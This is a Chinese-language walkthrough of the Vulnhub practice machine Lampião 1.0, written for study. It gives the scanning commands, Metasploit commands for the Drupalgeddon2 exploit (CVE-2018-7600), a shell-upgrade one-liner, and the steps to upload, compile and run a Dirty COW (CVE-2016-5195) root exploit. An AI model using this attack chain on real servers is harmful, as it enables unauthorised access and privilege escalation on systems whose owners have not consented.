Vulnhub靶机系列:Lampião 1.0

0x00 准备

靶机下载： https://www.vulnhub.com/entry/lampiao-1,249/

双击ovf文件，导入到Vmware中，选择NAT模式

Kali：192.168.194.192

0x01 利用知识及工具

nmap、netdiscover、脏牛提权、metasploit

0x02 测试

首先netdiscover扫描同一C段：netdiscover -i eth0 -r 192.168.194.1/24，找到目标机器IP:192.168.194.144.

利用nmap的TCP半开放扫描，对网站端口进行快速探测，nmap -sS -p 1-65535 192.168.194.144，该扫描方式因为它不打开一个完全的TCP连接，所以是使用频率最高的扫描方式。扫描结果发现开放22、80、1898端口

访问Web页面（80端口），仔细检查后没得到敏感信息，再次访问1898端口访问到正确的Web页面，在结尾看到cms是Drupal

想到CVE-2018-7600，利用msf打一波，msfconsole进入，search drupal，选择2018年的这个。

use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.194.144
set rport 1898
set target 0
run

成功拿到session会话，输入shell进入shell终端，再利用python获得一个TTY终端

python -c 'import pty; pty.spawn("/bin/bash")' ，发现是www-data权限。

接下来进行提权，首先查看下内核版本：uname -a

看到版本较高，但有可能存在 CVE-2016-5195 ，也就是脏牛(Dirty Cow)漏洞-Linux一个内核本地提权漏洞。黑客可通过远程入侵获取低权限用户后，利用该漏洞在全版本Linux系统服务器上实现本地提权，从而获取到服务器root权限。

漏洞影响范围：Linux Kernel >= 2.6.22 的所有 Linux 系统

意味着从 2007 年发布 2.6.22 版本开始，直到2016年10月18日为止，这中间发行的所有 Linux 系统都受影响。而我们的靶机为ubuntu14.04.5更新时间为16年-8月-05所以存在漏洞

在Kali中自带脏牛的脚本文件，新开一个终端【Ctrl】+【Shift】+【T】输入searchsploit dirty，找到需要的文件路径。

返回取得Shell的终端，按【Ctrl】+【C】返回meterpreter的session会话上传cpp文件到/tmp目录下，因为该目录一般是所有用户都具有可读可写权限

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

上传后再进入TTY的终端下，对cpp文件进行编译。

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

1-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
2-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
4-std=c++11就是用按C++2011标准来编译的
5-pthread 在Linux中要用到多线程时，需要链接pthread库
6-o dcow gcc生成的目标文件,名字为dcow

再运行编译后文件并将结果输出到一个文本中./dcow > status.txt